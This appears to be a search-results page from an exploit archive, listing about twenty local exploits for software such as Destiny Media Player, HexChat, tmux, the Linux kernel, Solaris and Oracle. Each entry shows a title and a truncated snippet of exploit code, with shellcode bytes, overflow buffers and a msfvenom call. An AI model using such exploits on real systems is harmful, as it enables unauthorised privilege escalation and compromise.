4067 matches found
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)
No description provided by source. usage: exploit.py print print Destiny Media Player 1.61 .lst File Local Stack Overflow Exploit\n print Founder: Encrypt3d.M!nd print exploit & code: Stack print Tested on: Windows XP Pro SP2 Fr\n print Greetings to: print All friends \n print buff = \x41 2052 EI...
Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Variant of CFCHARSETPATH a local root exploit by v9atfakehalo.us I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo. I...
HexChat 2.9.4 - Local Exploit
No description provided by source. !/usr/bin/python HexChat 2.9.4 Local Exploit Bug found by Jules Carter @iMulitia Exploit by Matt hostess Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = B30 shellcode = msfvenom -p windows/messagebo...
Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w ----------------------------------------------------------------------------- Author : h4ck3r47 Euphonics Audio Player v1.0 .pls Local Buffer Overflow Exploit Tested in Windows Pro Sp3 English Gr33tz to : str0ke , T.N.T:18 , AlpHaNiX , All...
tmux '-S' Option Incorrect SetGID Privilege Escalation Vulnerability
No description provided by source. --------------------------------------- | Team ph0x90bic proudly presents | | tmux -S 1.3/1.4 local utmp exploit | --------------------------------------- Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability Date: 11.04.2011...
Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (2)
No description provided by source. source: http://www.securityfocus.com/bid/5734/info Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'closetunnel' and 'opentunnel', both installed...
Juergen Weigert screen 3.9 User Supplied Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1641/info Various format string vulnerabilities exist in versions 3.9.5 and prior of 'screen' that may allow local users to elevate their privileges. If screen is setuid root, it is possible to alter the contents of the...
Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
No description provided by source. / gw-ftrex.c: Linux kernel 2.6.22 open/ftruncate local exploit by gat3way at gat3way dot eu bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to write into...
Xsok 1.02 - "-xsokdir" Local Buffer Overflow Game Exploit
No description provided by source. / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded by c0wboy c 0x333 Outsiders Security Labs / www.0x333.org / include stdio.h include unistd.h define BIN /usr/games/xsok define RETADD 0xbffffa3c define SIZE 200 unsigned char shellcode = /...
UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit 2
No description provided by source. ultra iso exploit thomas . pollet @ gmail . com import struct scode=metasploit calc.exe shellcode \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49 \x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36...
Windows Escalate UAC Protection Bypass
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
Solaris 10 libnspr - constructor Local Root Exploit
No description provided by source. !/bin/sh $Id: raptorlibnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $ raptorlibnspr3 - Solaris 10 libnspr constructor exploit Copyright c 2006 Marco Ivaldi [email protected] Local exploitation of a design error vulnerability in version 4.6.1 of NSPR, as...
Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit
No description provided by source. / 0day, description is wrong. /str0ke / / Fucking NON-0 day$ exploit for Oracle 10g 10.2.0.2.0 Patch your database now! by N1V1Hd $3c41r3 / CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENTUSER IS FUNCTION ODCIIndexGetMetadata oindexinfo SYS.odciindexinfo,P3...
Oracle Solaris - 'su' Local Solaris Vulnerability
No description provided by source. From http://cvs.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/cmd/su/su.c 521 for j = 0; initenvj != 0; j++ 1 522 if initvar = getenvinitenvj 2 ... 535 else 536 var = char 537 mallocstrleninitenvj 3 538 + strleninitvar 539 + 2; 540 void strcpyvar, initenvj;...
Ipswitch WS_FTP 2007 Professional WSFTPURL.EXE Local Memory Corruption Vulnerability
No description provided by source...
Linux Kernel 2.6.10 File Lock Local Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12949/info A local denial of service vulnerability reportedly affects the Linux kernel. This issue arises due to a failure of the kernel to properly handle malicious, excessive file locks. An attacker may leverage this...
SudoEdit 1.6.8 - Local Change Permission Exploit
No description provided by source...
kosch suid wrapper 1.1.1 - Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2837/info A boundary condition error exists in suid wrapper or 'su-wrapper.' The overflow occurs when a string exceeding approximately 1032 characters is given as the first argument when the program is run. Because the...
KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC
No description provided by source. !/usr/bin/perl Usage--file created--load file--b00m.wav BOOM print \n; print ! KOL WaveIOX 1.04 .wav Local Buffer Overflow PoC\n; print \n; print ! Author: cr4wl3r\n; print ! Mail: cr4wl3r!linuxmail.org\n; print \n; my $boom = http://.\x41 x 1337; my $filename =...
BSD-Games 2.x Mille Local Save Game File Name Buffer Overrun Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10165/info bsd-games mille is prone to a locally exploitable buffer overrun vulnerability. This issue is due to insufficient bounds checking when the user inputs a file name when saving a game. This game is typically...